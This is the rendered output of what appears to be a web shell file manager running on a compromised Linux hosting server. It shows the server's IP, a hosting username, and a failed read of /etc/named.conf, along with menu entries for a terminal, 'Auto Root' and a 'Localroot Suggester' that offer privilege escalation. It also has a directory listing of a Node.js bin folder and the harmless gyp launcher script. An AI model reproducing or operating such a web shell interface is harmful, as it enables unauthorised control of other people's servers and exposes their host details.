Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.188
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
alt-nodejs8 /
root /
usr /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
derb
33.34
KB
-rwxr-xr-x
2019-12-13 16:41
genbrk
19.86
KB
-rwxr-xr-x
2019-12-13 16:41
gencfu
15.7
KB
-rwxr-xr-x
2019-12-13 16:41
gencnval
28.16
KB
-rwxr-xr-x
2019-12-13 16:41
gendict
33.66
KB
-rwxr-xr-x
2019-12-13 16:41
genrb
169.81
KB
-rwxr-xr-x
2019-12-13 16:41
gyp
463
B
-rwxr-xr-x
2019-12-13 16:36
icu-config
215
B
-rwxr-xr-x
2019-12-13 16:39
icu-config-64
21.84
KB
-rwxr-xr-x
2019-12-13 16:41
icuinfo
15.73
KB
-rwxr-xr-x
2019-12-13 16:41
makeconv
64.59
KB
-rwxr-xr-x
2019-12-13 16:41
node
18.92
MB
-rwxr-xr-x
2021-09-28 14:33
npm
4.53
KB
-rwxr-xr-x
2021-09-28 13:59
npx
198
B
-rwxr-xr-x
2021-09-28 13:59
pkgdata
56.75
KB
-rwxr-xr-x
2019-12-13 16:41
uconv
58.99
KB
-rwxr-xr-x
2019-12-13 16:41
Save
Rename
#!/usr/bin/python2 # Copyright (c) 2009 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import sys # TODO(mark): sys.path manipulation is some temporary testing stuff. try: import gyp except ImportError, e: import os.path sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), 'pylib')) import gyp if __name__ == '__main__': sys.exit(gyp.main(sys.argv[1:]))